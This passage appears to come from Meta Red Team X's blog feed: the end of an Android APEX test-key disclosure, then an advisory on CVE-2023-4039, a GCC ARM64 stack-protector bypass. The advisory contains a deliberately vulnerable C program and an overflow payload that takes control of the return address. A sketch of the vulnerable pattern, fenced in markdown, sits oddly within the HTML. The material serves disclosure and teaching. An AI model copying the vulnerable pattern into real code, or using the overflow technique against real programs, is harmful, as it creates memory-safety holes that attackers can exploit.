  <li><strong>Google Pixel 5</strong><br />
<code class="language-plaintext highlighter-rouge">google/redfin/redfin:13/TQ3A.230805.001.A2/10385117:user/release-keys</code><br />
Physical device</li>
  <li><strong>Samsung Galaxy S23</strong><br />
<code class="language-plaintext highlighter-rouge">samsung/dm1quew/dm1q:13/TP1A.220624.014/S911U1UEU1AWGH:user/release-keys</code><br />
Official Samsung OTA ZIP, fetched with <a href="https://github.com/martinetd/samloader">samloader</a></li>
  <li><strong>Xiaomi Redmi Note 12 4G</strong><br />
<code class="language-plaintext highlighter-rouge">Redmi/tapas_global/tapas:13/TKQ1.221114.001/V14.0.12.0.TMTMIXM:user/release-keys</code><br />
<a href="https://bigota.d.miui.com/V14.0.12.0.TMTMIXM/miui_TAPASGlobal_V14.0.12.0.TMTMIXM_7e3f673289_13.0.zip">Official Xiaomi OTA ZIP</a></li>
  <li><strong>OPPO Find X6 Pro</strong><br />
<code class="language-plaintext highlighter-rouge">OPPO/PGEM10/OP528BL1:13/TP1A.220905.001/T.10b3891-27825-556fa:user/release-keys</code><br />
<a href="https://dumps.tadiphone.dev/dumps/oppo/op528bl1">dumps.tadiphone.dev, oppo/op528bl1</a></li>
  <li><strong>Sony Xperia 1 V</strong><br />
<code class="language-plaintext highlighter-rouge">Sony/pdx234/pdx234:13/TKQ1.221114.001/1:user/release-keys</code><br />
<a href="https://dumps.tadiphone.dev/dumps/sony/pdx234">dumps.tadiphone.dev, sony/pdx234</a></li>
  <li><strong>moto razr 40 Ultra</strong><br />
<code class="language-plaintext highlighter-rouge">motorola/zeekr_cn/msi:13/T2TZ33M.18-35-5/dcdd5:user/release-keys</code><br />
<a href="https://dumps.tadiphone.dev/dumps/motorola/zeekr">dumps.tadiphone.dev, motorola/zeekr</a></li>
  <li><strong>OnePlus 10T</strong><br />
<code class="language-plaintext highlighter-rouge">OnePlus/CPH2413/OP5552L1:13/SKQ1.221119.001/S.123ec2a_6b801_6ff30:user/release-keys</code><br />
<a href="https://dumps.tadiphone.dev/dumps/oneplus/op5552l1">dumps.tadiphone.dev, oneplus/op5552l1</a></li>
</ul>

<h2 id="appendix-disclosure-timeline">Appendix: disclosure timeline</h2>

<ul>
  <li>September 6th, 2023: We notice that an Android device we use for testing has APEXes signed with test keys, which prompts us to check other devices.</li>
  <li>September 13th, 2023: We complete our survey and conclude that the issue is widespread enough that Google should coordinate the response.</li>
  <li>September 19th, 2023: We report our findings to Google, who passes them to the Android Security Team.</li>
  <li>September 25th, 2023: Google releases an Android Partner Security Advisory to their OEM partners detailing the issue. The next day, they respond to us, rating the issue High Severity.</li>
  <li>September 28th, 2023: Google informs us of the Partner Advisory and indicates they’ve contacted affected OEMs directly.</li>
  <li>October 18th, 2023: Google updates the Partner Security Advisory with details on remediation, stating that the issue will be part of the December 4th Android Security Bulletin and detailing the BTS enforcement schedule.</li>
  <li>October 26th, 2023: We ask Google if the December ASB will contain enough details to warrant simultaneous release of this post, even if most OEMs haven’t released a fix. Google replies that the bulletin text won’t contain “specific technical information” but that they do “consider [the issue] publicly disclosed” at that point.</li>
  <li>November 1st, 2023: BTS purportedly begins warning OEMs when a build has vulnerable APEXes.</li>
  <li>November 6th, 2023: We notify affected OEMs that we’ll name them in this post on December 4th, as we believe the ASB will include CTS patches indicating APEXes have been signed with test keys. We offer to publish statements from them. We receive an automated acknowledgement from Nothing, and Nokia Corporation tells us they’ve passed the email to HMD Global, who makes Nokia-branded phones but “don’t have [a] similar responsible disclosure program”.</li>
  <li>November 7th, 2023: Google updates the Partner Security Advisory to add the CVE number and a note that only “builds … claiming the 2023-12-05 SPL or higher” will be subject to BTS enforcement on December 4th.</li>
  <li>November 13th, 2023: Lenovo confirms receipt of our email and says they don’t yet have a statement.</li>
  <li>Week of November 13th, 2023: Multiple OEMs create keys to re-sign their vulnerable APEXes, as evidenced by metadata in the updates they subsequently released.</li>
  <li>November 15th, 2023: Google asks permission to share our detection tooling with OEMs who want an offline way to find vulnerable APEXes. We grant it.</li>
  <li>November 15th, 2023: We ask Google explicitly if the December ASB will include CTS patches, as our plan to disclose on December 4th relies on that assumption.</li>
  <li>November 21st, 2023: Google sends us a generic update which formally shares the CVE ID and states in part that they “will be releasing a patch for this issue in an upcoming bulletin”.</li>
  <li>November 27th, 2023: We notice that the December ASB partner preview, which Meta has access to but most researchers don’t, contains no APEX-related CTS patches. We ask Google to confirm that the ASB will expose details of the issue via a patch. Google replies that CTS patches actually won’t become public until Android V and that they support us giving OEMs more time.</li>
  <li>November 28th, 2023: Lenovo asks us if we plan to disclose on December 4th, like our notice claimed, or on December 18th (90 days from our initial report), like Google’s Partner Advisory claimed. We reply that it’ll be the 4th but that we’re considering postponement given the new information from Google.</li>
  <li>December 1st, 2023: Lenovo follows up on their question. We opt to officially postpone disclosure until January 30th, 2024, and notify all OEMs of the change. At this point, to our knowledge, no OEMs have yet released fixes.</li>
  <li>December 4th, 2023: The <a href="https://source.android.com/docs/security/bulletin/2023-12-01">December ASB</a> comes out. As promised, it contains no details an attacker could use to discern the issue.</li>
  <li>December 7th, 2023: Fairphone thanks us for the postponement, says they intend to provide a statement, and asks permission to credit us in their own disclosure. We accept, and a couple weeks later we exchange statements and links where our respective disclosures will appear.</li>
  <li>January 16th, 2024: Google offers us a $7,000 bounty for our report, which we ask them on January 25th to donate to charity. (Google, like Meta, doubles bounties paid to charity.)</li>
  <li>January 25th, 2024: Lenovo asks for confirmation that January 30th is still our planned disclosure date, which we give.</li>
  <li>January 30th, 2024: This post, <a href="https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-wmcc-g67r-9962">our disclosure</a>, <a href="https://github.com/metaredteam/rtx-cve-2023-45779">our PoC code</a>, and <a href="https://www.fairphone.com/en/2023/12/22/security-update-apex-modules-vulnerability-fixed">Fairphone’s post</a> all go live.</li>
</ul>]]></content><author><name>Tom Hebb, Red Team X</name></author><category term="exploitation" /><summary type="html"><![CDATA[We recently discovered that Android devices from multiple major brands sign APEX modules—updatable units of highly-privileged OS code—using private keys from Android’s public source repository. Anyone can forge an APEX update for such a device to gain near-total control over it. Rather than negligence by any particular manufacturer (OEM), we believe that unsafe defaults, poor documentation, and incomplete CTS coverage in the Android Open Source Project (AOSP) were the main causes of this issue.]]></summary></entry><entry><title type="html">CVE-2023-4039: GCC’s -fstack-protector fails to guard dynamic stack allocations on ARM64</title><link href="https://rtx.meta.security/mitigation/2023/09/12/CVE-2023-4039.html" rel="alternate" type="text/html" title="CVE-2023-4039: GCC’s -fstack-protector fails to guard dynamic stack allocations on ARM64" /><published>2023-09-12T00:00:00+00:00</published><updated>2023-09-12T00:00:00+00:00</updated><id>https://rtx.meta.security/mitigation/2023/09/12/CVE-2023-4039</id><content type="html" xml:base="https://rtx.meta.security/mitigation/2023/09/12/CVE-2023-4039.html"><![CDATA[<p>GCC’s stack smashing protection, which keeps attackers from exploiting stack buffer overflow bugs in code it compiles, has no effect when the vulnerable buffer is a variable-length array or <code class="language-plaintext highlighter-rouge">alloca()</code> allocation and the target architecture is 64-bit ARM. This issue is a mitigation weakness and is not exploitable directly. <a href="https://gcc.gnu.org/pipermail/gcc-patches/2023-September/630054.html">A fix is now available on GCC’s mailing list.</a> All versions of GCC are affected, so we recommend you incorporate that fix if you distribute GCC or ARM64 binaries compiled with GCC.</p>

<h2 id="background">Background</h2>

<p><a href="https://www.memorysafety.org/docs/memory-safety/#how-common-are-memory-safety-vulnerabilities">Memory safety bugs cause most security vulnerabilities in C and C++ programs.</a> A common and easily-exploitable type of memory safety bug is the <strong>stack buffer overflow</strong>, in which a program fails to check that an attacker-controlled length or offset is within the bounds of a local (i.e. stack-allocated) array, allowing the attacker to write to memory past the end of that array:</p>

<ol>
  <li>Stack buffer overflows are common because C makes bounds checking hard. The only way to pass an array to a function in C is to pass a pointer to the beginning of that array, which discards its length. Well-written functions take the length as a separate parameter so they can perform bounds checks, but many functions (e.g. <code class="language-plaintext highlighter-rouge">gets()</code> and <code class="language-plaintext highlighter-rouge">strcpy()</code> in libc) aren’t well-written. Even well-written functions have no way to verify that the length they receive is correct and not, say, derived from attacker-controlled input.</li>
  <li>Stack buffer overflows are easily exploitable because they usually let an attacker control execution instead of just data. The stack, which holds local variables of each running function, also holds each function’s <strong>return address</strong>, which tells it where it was called from so it can go back there once it’s done. By changing the return address, the attacker can make the program run code of their choosing.</li>
</ol>

<p>Compiler warnings and static analysis tools help solve #1 by flagging safety bugs when code is written, but the nature of C and C++ makes both false positives and false negatives inevitable. (Safe languages like Rust fully solve #1, but it’ll be a while yet before the average person relies on no security-critical C or C++ in their daily life.)</p>

<p>As such, modern C/C++ compilers also try to solve #2 by making stack buffer overflows harder to exploit in the programs they compile. They do so using <a href="https://en.wikipedia.org/wiki/Buffer_overflow_protection">various techniques</a>, but the one we’ll discuss today is known as <strong>stack smashing protection</strong>.</p>

<p>Functions compiled with stack smashing protection place a secret, randomly-generated value known as a <strong>stack guard</strong> or <strong>stack canary</strong> in their stack frame, between their local variables and their return address. Right before they return, they check if the guard has changed and (in most runtimes) abort the program immediately if it has. The compiler automatically inserts the instructions to set and check the guard, so no source code changes are needed.</p>

<p>Such a drastic response is warranted because, if the stack guard changes, there’s a 100% chance that a buffer overflow has occurred. The reverse is not true, though: stack guards only reliably detect <strong>contiguous</strong> overflow bugs, in which an attacker controls the length of data written to a local array but not the offset. If they do control the offset, they can selectively overwrite the return address while leaving the guard and other intervening bytes unchanged. Many real-world bugs allow only contiguous overflows, though; for those, stack guards are effective.</p>

<p><a href="https://gcc.gnu.org/">GCC</a> is one of the most popular C/C++ compilers in the world. It protects against stack smashing exactly as just described when invoked with the <code class="language-plaintext highlighter-rouge">-fstack-protector</code> flag or one of its variants. AArch64 is the 64-bit version of the ARM architecture and powers most modern handheld devices.</p>

<h2 id="vulnerability-details">Vulnerability details</h2>

<p>On AArch64 targets, GCC’s stack smashing protection does not detect or defend against overflows of dynamically-sized local variables. In C, dynamically-sized variables include both <a href="https://en.wikipedia.org/wiki/Variable-length_array">variable-length arrays</a> and buffers allocated using <code class="language-plaintext highlighter-rouge">alloca()</code>. GCC’s AArch64 stack frames place such variables immediately below saved register values like the return address with no intervening stack guard. All versions of GCC that support the pertinent features are affected.</p>

<p>The reason this happens for AArch64 but not for other GCC targets is that GCC’s AArch64 backend lays out stack frames in an unconventional way: instead of saving the return address at the top of a frame (i.e. at the highest address, pushed before anything else) like most other backends and compilers, it saves it near the bottom of the frame, <em>below</em> the local variables. <a href="https://gcc.gnu.org/git/?p=gcc.git&amp;a=blob&amp;f=gcc%2Fconfig%2Faarch64%2Faarch64.cc&amp;h=44935e80565f#l9940">This comment</a> from GCC’s source documents the frame layout:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">/*</span> <span class="n">AArch64</span> <span class="n">stack</span> <span class="n">frames</span> <span class="n">generated</span> <span class="n">by</span> <span class="n">this</span> <span class="n">compiler</span> <span class="n">look</span> <span class="n">like</span><span class="o">:</span>

	<span class="o">+-------------------------------+</span>
	<span class="o">|</span>                               <span class="o">|</span>
	<span class="o">|</span>  <span class="n">incoming</span> <span class="n">stack</span> <span class="n">arguments</span>     <span class="o">|</span>
	<span class="o">|</span>                               <span class="o">|</span>
	<span class="o">+-------------------------------+</span>
	<span class="o">|</span>                               <span class="o">|</span> <span class="o">&lt;--</span> <span class="n">incoming</span> <span class="n">stack</span> <span class="n">pointer</span> <span class="p">(</span><span class="n">aligned</span><span class="p">)</span>
	<span class="o">|</span>  <span class="n">callee</span><span class="o">-</span><span class="n">allocated</span> <span class="n">save</span> <span class="n">area</span>   <span class="o">|</span>
	<span class="o">|</span>  <span class="k">for</span> <span class="k">register</span> <span class="n">varargs</span>         <span class="o">|</span>
	<span class="o">|</span>                               <span class="o">|</span>
	<span class="o">+-------------------------------+</span>
	<span class="o">|</span>  <span class="n">local</span> <span class="n">variables</span>              <span class="o">|</span> <span class="o">&lt;--</span> <span class="n">frame_pointer_rtx</span>
	<span class="o">|</span>                               <span class="o">|</span>
	<span class="o">+-------------------------------+</span>
	<span class="o">|</span>  <span class="n">padding</span>                      <span class="o">|</span> \
	<span class="o">+-------------------------------+</span>  <span class="o">|</span>
	<span class="o">|</span>  <span class="n">callee</span><span class="o">-</span><span class="n">saved</span> <span class="n">registers</span>       <span class="o">|</span>  <span class="o">|</span> <span class="n">frame</span><span class="p">.</span><span class="n">saved_regs_size</span>
	<span class="o">+-------------------------------+</span>  <span class="o">|</span>
	<span class="o">|</span>  <span class="n">LR</span><span class="err">'</span>                          <span class="o">|</span>  <span class="o">|</span>
	<span class="o">+-------------------------------+</span>  <span class="o">|</span>
	<span class="o">|</span>  <span class="n">FP</span><span class="err">'</span>                          <span class="o">|</span>  <span class="o">|</span>
	<span class="o">+-------------------------------+</span>  <span class="o">|&lt;-</span> <span class="n">hard_frame_pointer_rtx</span> <span class="p">(</span><span class="n">aligned</span><span class="p">)</span>
	<span class="o">|</span>  <span class="n">SVE</span> <span class="n">vector</span> <span class="n">registers</span>         <span class="o">|</span>  <span class="o">|</span> \
	<span class="o">+-------------------------------+</span>  <span class="o">|</span>  <span class="o">|</span> <span class="n">below_hard_fp_saved_regs_size</span>
	<span class="o">|</span>  <span class="n">SVE</span> <span class="n">predicate</span> <span class="n">registers</span>      <span class="o">|</span> <span class="o">/</span>  <span class="o">/</span>
	<span class="o">+-------------------------------+</span>
	<span class="o">|</span>  <span class="n">dynamic</span> <span class="n">allocation</span>           <span class="o">|</span>
	<span class="o">+-------------------------------+</span>
	<span class="o">|</span>  <span class="n">padding</span>                      <span class="o">|</span>
	<span class="o">+-------------------------------+</span>
	<span class="o">|</span>  <span class="n">outgoing</span> <span class="n">stack</span> <span class="n">arguments</span>     <span class="o">|</span> <span class="o">&lt;--</span> <span class="n">arg_pointer</span>
	<span class="o">|</span>                               <span class="o">|</span>
	<span class="o">+-------------------------------+</span>
	<span class="o">|</span>                               <span class="o">|</span> <span class="o">&lt;--</span> <span class="n">stack_pointer_rtx</span> <span class="p">(</span><span class="n">aligned</span><span class="p">)</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">LR'</code> is the return address, so named because it’s saved from the <a href="https://developer.arm.com/documentation/dui0801/l/Overview-of-AArch64-state/Link-registers">LR</a> register, and is the target of nearly all stack smashing attacks. It may then seem like a feature, not a bug, to put it at a lower address than the locals: a contiguous overflow only lets an attacker write to memory past the vulnerable local, so this layout keeps the return address out of their reach! In practice though, the memory immediately past a function’s stack frame is almost always another stack frame (belonging to the calling function) with its own saved LR value that the attacker can manipulate to the same effect.</p>

<p>You may notice that the layout above makes no mention of a stack guard. That’s because GCC’s architecture-independent code treats the stack guard as a local, <a href="https://gcc.gnu.org/git/?p=gcc.git&amp;a=blob&amp;f=gcc%2Fcfgexpand.cc&amp;h=85a93a547c0b#l2286">placing it</a> at the very top of the local area without any input from the target backend. Implicit in that placement is an assumption that locals will always occupy one contiguous region with no saved registers interspersed. But that assumption doesn’t hold on AArch64: as shown in the diagram, dynamic allocations live at the very bottom of the stack frame, below the saved registers, with no intervening guard.</p>

<p>Dynamic allocations are just as susceptible to overflows as other locals. In fact, they’re arguably more susceptible because they’re almost always arrays, whereas fixed locals are often integers, pointers, or other types to which variable-length data is never written. GCC’s own heuristics for when to use a stack guard reflect this, with its man page saying this about <code class="language-plaintext highlighter-rouge">-fstack-protector</code> (emphasis ours):</p>

<blockquote>
  <p>Emit extra code to check for buffer overflows … by adding a guard variable to functions with vulnerable objects. This includes <strong>functions that call “alloca”</strong>, and functions with buffers larger than or equal to 8 bytes.</p>
</blockquote>

<h2 id="demonstration">Demonstration</h2>

<p>The following C program is vulnerable to a contiguous stack overflow attack even when compiled with <code class="language-plaintext highlighter-rouge">-fstack-protector</code> or <code class="language-plaintext highlighter-rouge">-fstack-protector-all</code>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdint.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">argc</span> <span class="o">!=</span> <span class="mi">2</span><span class="p">)</span>
        <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Variable-length array</span>
    <span class="kt">uint8_t</span> <span class="n">input</span><span class="p">[</span><span class="n">atoi</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">])];</span>

    <span class="kt">size_t</span> <span class="n">n</span> <span class="o">=</span> <span class="n">fread</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">4096</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span>
    <span class="n">fwrite</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="n">stdout</span><span class="p">);</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>We cross-compiled this program for AArch64 using Arm’s GCC 12.2.Rel1 <a href="https://developer.arm.com/downloads/-/arm-gnu-toolchain-downloads">prebuilt toolchain</a> and then ran it under QEMU, with debugging enabled, on an x86_64 host:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>aarch64-none-linux-gnu-gcc <span class="nt">-fstack-protector-all</span> <span class="nt">-O3</span> <span class="nt">-static</span> <span class="nt">-Wall</span> <span class="nt">-Wextra</span> <span class="nt">-pedantic</span> <span class="nt">-o</span> example-dynamic example-dynamic.c
<span class="nv">$ </span><span class="nb">echo</span> <span class="nt">-n</span> <span class="s1">'DDDDDDDDPPPPPPPPFFFFFFFFAAAAAAAA'</span> | qemu-aarch64 <span class="nt">-g</span> 5555 example-dynamic 8
</code></pre></div></div>

<p>We ask the program to make a dynamic allocation of size 8, which GCC rounds up to 16. The exploit payload mirrors the stack layout, with the eight “D”s representing the non-overflowing data, the eight “P”s padding out the actual allocation, the eight “F”s overwriting the saved frame pointer, and the eight “A”s overwriting the saved return address.</p>

<p>Attaching a debugger and resuming the program results in an immediate crash (a SIGBUS under QEMU) with PC set to the address from our payload, showing we have full control over execution flow despite the stack guard:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>gdb example-dynamic
GNU gdb <span class="o">(</span>GDB<span class="o">)</span> Fedora Linux 13.1-3.fc37
&lt;snip&gt;
<span class="o">(</span>gdb<span class="o">)</span> target remote :5555
Remote debugging using :5555
&lt;snip&gt;
<span class="o">(</span>gdb<span class="o">)</span> <span class="k">continue
</span>Continuing.

Program received signal SIGBUS, Bus error.
0x0041414141414141 <span class="k">in</span> ?? <span class="o">()</span>
<span class="o">(</span>gdb<span class="o">)</span> print/a <span class="nv">$pc</span>
<span class="nv">$1</span> <span class="o">=</span> 0x41414141414141
</code></pre></div></div>

<p>For comparison, the following program, which uses a fixed allocation of size 8 instead of a dynamic one, detects the overflow correctly (the “G”s in the payload overwrite the guard):</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdint.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">uint8_t</span> <span class="n">input</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span>

    <span class="kt">size_t</span> <span class="n">n</span> <span class="o">=</span> <span class="n">fread</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">4096</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span>
    <span class="n">fwrite</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="n">stdout</span><span class="p">);</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>aarch64-none-linux-gnu-gcc <span class="nt">-fstack-protector-all</span> <span class="nt">-O3</span> <span class="nt">-static</span> <span class="nt">-Wall</span> <span class="nt">-Wextra</span> <span class="nt">-pedantic</span> <span class="nt">-o</span> example-static example-static.c
<span class="nv">$ </span><span class="nb">echo</span> <span class="nt">-n</span> <span class="s1">'DDDDDDDDGGGGGGGG'</span> | qemu-aarch64 example-static
<span class="k">***</span> stack smashing detected <span class="k">***</span>: terminated
Aborted <span class="o">(</span>core dumped<span class="o">)</span>
</code></pre></div></div>

<h2 id="response">Response</h2>

<p>Meta’s Red Team X reported this issue privately to Arm on May 31st, 2023. We would have preferred to report the issue to GCC, but at that time GCC had no documented private disclosure process. Progress has since been made on <a href="https://gcc.gnu.org/pipermail/gcc-patches/2023-August/626529.html">creating one</a>. Since every AArch64 maintainer in GCC’s <code class="language-plaintext highlighter-rouge">MAINTAINERS</code> file has an @arm.com email address, Arm was our next best choice.</p>

<p>Arm acknowledged our report immediately, and their compiler team confirmed our findings within a day. They had a fix ready by August 1st and met with us to agree on a coordinated disclosure process. Over the following month, Arm shared the patch with widely-used Linux distributions and other partners of theirs, both to get extra eyes on the patch and to allow those partners time to rebuild their software repositories. As it happens, one partner found an issue with Arm’s initial fix—involving a missing barrier against instruction reordering—that made it inadequate in certain cases. We delayed our initial disclosure date to allow Arm to distribute a revised version of the patch.</p>

<p>Arm has been extremely responsive throughout the process and has taken the lead to get the fix where it needs to go. We’d like to thank them for their professionalism.</p>

<p>Because GCC development happens in the open, we were unable to coordinate with GCC to announce new releases simultaneous with this post and other disclosures. However, <a href="https://gcc.gnu.org/pipermail/gcc-patches/2023-September/630054.html">Arm’s patches for the issue</a> are now on GCC’s mailing list, and we expect releases to follow in short order. The following other disclosures will also appear:</p>

<ul>
  <li><a href="https://www.cve.org/CVERecord?id=CVE-2023-4039">CVE-2023-4039</a></li>
  <li><a href="https://developer.arm.com/Arm%20Security%20Center/GCC%20Stack%20Protector%20Vulnerability%20AArch64">Arm’s security bulletin</a></li>
  <li><a href="https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-x7ch-h5rf-w2mf">Meta’s disclosure</a></li>
</ul>

<h2 id="prior-work">Prior work</h2>

<p>GCC’s ARM stack guards have a history of subtle correctness issues:</p>

<ul>
  <li><a href="https://blog.inhq.net/posts/faulty-stack-canary-arm-systems/">Faulty Stack Smashing Protection on ARM Systems</a> by Christian Reitter: writeup of a GCC bug that caused AArch32 stack guards to hold the address of the guard value rather than the value itself, making it much easier to guess.</li>
  <li><a href="https://gcc.gnu.org/bugzilla/show_bug.cgi?id=85434">CVE-2018-12886</a>: a GCC bug that in certain cases let an attacker control what value an AArch32 stack guard was compared against by overwriting a different stack variable that was not itself protected.</li>
</ul>

<h2 id="appendix-assembly-analysis">Appendix: assembly analysis</h2>

<p>We graphed the proof-of-concept binaries from above using <a href="https://rizin.re/">Rizin</a>’s <a href="https://book.rizin.re/analysis/graphs.html"><code class="language-plaintext highlighter-rouge">agfd</code> command</a> to illustrate how the problem manifests in assembly. This is the disassembly graph of the buggy <code class="language-plaintext highlighter-rouge">example-dynamic</code>:</p>

<p><img src="https://rtx.meta.security/assets/images/CVE-2023-4039/example-dynamic-main.svg" alt="&quot;Control flow graph for dynamic allocation&quot;" /></p>

<p>There’s a lot happening, but the <strong>bold</strong> lines are the ones to focus on. The very first instruction in the function, <code class="language-plaintext highlighter-rouge">stp x29, x30, [sp, -0x20]!</code>, decrements the <code class="language-plaintext highlighter-rouge">sp</code> register by <code class="language-plaintext highlighter-rouge">0x20</code> (the <code class="language-plaintext highlighter-rouge">!</code> means modify <code class="language-plaintext highlighter-rouge">sp</code> instead of just calculating an offset), thereby reserving space for the function’s stack frame, then <strong>st</strong>ores a <strong>p</strong>air of registers at the bottom of that reserved space. Those registers, <code class="language-plaintext highlighter-rouge">x29</code> and <code class="language-plaintext highlighter-rouge">x30</code>, are the frame pointer and link register (LR) respectively. Recall that LR holds the return address that an attacker aims to control.</p>

<p>A few instructions later, <code class="language-plaintext highlighter-rouge">str x3, [x29, 0x18]</code> places the 8-byte stack guard at the top of the stack space. <code class="language-plaintext highlighter-rouge">x29</code>, the frame pointer, has been updated to match the decremented <code class="language-plaintext highlighter-rouge">sp</code>, a value it retains for the rest of the function. At this point, the stack looks like this (offsets relative to <code class="language-plaintext highlighter-rouge">x29</code>):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 0x18 stack guard
 0x10 padding
 0x08 saved x30 (LR)
 0x00 saved x29        &lt;-- x29, sp
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">sp</code>, on the other hand, doesn’t keep its value: to allocate the dynamically-sized <code class="language-plaintext highlighter-rouge">input</code> array, it’s decremented by <code class="language-plaintext highlighter-rouge">input</code>’s size (<code class="language-plaintext highlighter-rouge">sub sp, sp, x0</code>). It’s then passed as the first argument to <code class="language-plaintext highlighter-rouge">fread()</code>, which populates it with user-controlled data. Assuming a dynamic size of 8 (which GCC pads to 16), the stack now looks like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 0x18 stack guard
 0x10 padding
 0x08 saved x30 (LR)
 0x00 saved x29        &lt;-- x29
-0x08 padding
-0x10 input[8]         &lt;-- sp
</code></pre></div></div>

<p>At this point, the issue is clear: a contiguous overflow of <code class="language-plaintext highlighter-rouge">input</code> reaches the saved LR before it even gets close to the stack guard, making the guard ineffective for detecting that overflow.</p>
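<p>The C shape that produces this layout is simply a dynamically-sized buffer filled from user input. A minimal sketch (not the post’s exact PoC source; the function and parameter names are ours):</p>

```c
#include <stdio.h>

/* Sketch of the vulnerable pattern: a variable-length array makes GCC
 * bump sp below the saved registers ("sub sp, sp, x0"), so the fread()
 * destination sits below the saved LR. With the pre-fix compiler, a
 * read_len greater than alloc_len overwrites the saved LR before the
 * overflow ever reaches the stack guard. */
size_t read_dynamic(FILE *stream, size_t alloc_len, size_t read_len) {
    char input[alloc_len];                    /* dynamically-sized buffer */
    return fread(input, 1, read_len, stream); /* user-controlled data at sp */
}
```

<p>Compiled with the same <code class="language-plaintext highlighter-rouge">-fstack-protector-all</code> flags as above, this function still gets a guard; the guard just sits on the wrong side of <code class="language-plaintext highlighter-rouge">input</code>.</p>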

<hr />

<p>For comparison, here’s the disassembly graph of <code class="language-plaintext highlighter-rouge">example-static</code>, which does not perform any dynamic allocation:</p>

<p><img src="https://rtx.meta.security/assets/images/CVE-2023-4039/example-static-main.svg" alt="&quot;Control flow graph for static allocation&quot;" /></p>

<p>The function begins exactly the same way, storing saved registers at the bottom of the frame and the stack guard at the top. But when it comes time to read user input, <code class="language-plaintext highlighter-rouge">sp</code> isn’t decremented again. Instead, the first argument to <code class="language-plaintext highlighter-rouge">fread()</code> is within the already-allocated space, <em>above</em> the saved registers (<code class="language-plaintext highlighter-rouge">add x0, sp, 0x10</code>). So we have a stack layout like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 0x18 stack guard
 0x10 input[8]
 0x08 saved x30 (LR)
 0x00 saved x29        &lt;-- x29, sp
</code></pre></div></div>

<p>Here, the stack guard works just as it’s designed: since it immediately follows <code class="language-plaintext highlighter-rouge">input</code>, an attacker can’t manipulate anything further up the stack using a contiguous overflow without also changing the guard’s value.</p>

<h2 id="appendix-disclosure-timeline">Appendix: disclosure timeline</h2>

<ul>
  <li>April 27th, 2023: During an <a href="https://azeria-labs.com/">Azeria Labs</a> ARM exploitation training, we notice that one of the demo binaries has a misplaced stack canary and investigate the cause.</li>
  <li>May 31st, 2023: We disclose the issue privately to Arm, as GCC has no security contact and every MAINTAINER of GCC’s AArch64 backend is Arm-affiliated.</li>
  <li>May 31st, 2023: Arm’s Product Security Incident Response Team acknowledges and triages the report.</li>
  <li>June 1st, 2023: Arm confirms that the report is valid and asks if we intend to issue a CVE or if they should. We respond that we prefer the latter.</li>
  <li>July 13th, 2023: We remind Arm that the 90-day disclosure window is nearly halfway past and ask for a progress update.</li>
  <li>August 1st, 2023: Arm indicates they have a fix ready and requests a call with Meta to discuss coordinated disclosure.</li>
  <li>August 3rd, 2023: Arm and RTX meet. Arm proposes notifying distros and hyperscale partners prior to public disclosure. Meta agrees to that plan.</li>
  <li>August 21st, 2023: Arm and RTX meet again to finalize the disclosure timeline. We agree to make all advisories and patches public on August 29th, 90 days after RTX’s initial report, unless any of Arm’s partners request an extension.</li>
  <li>August 23rd, 2023: One of Arm’s partners requests disclosure be postponed by a week, so we set the new date to September 5th.</li>
  <li>August 30th, 2023: Arm notifies us that a compiler partner found a weakness in the patched mitigation and that they’ll need to revise their patch. We agree to postpone disclosure by another week, to September 12th, to allow time for that.</li>
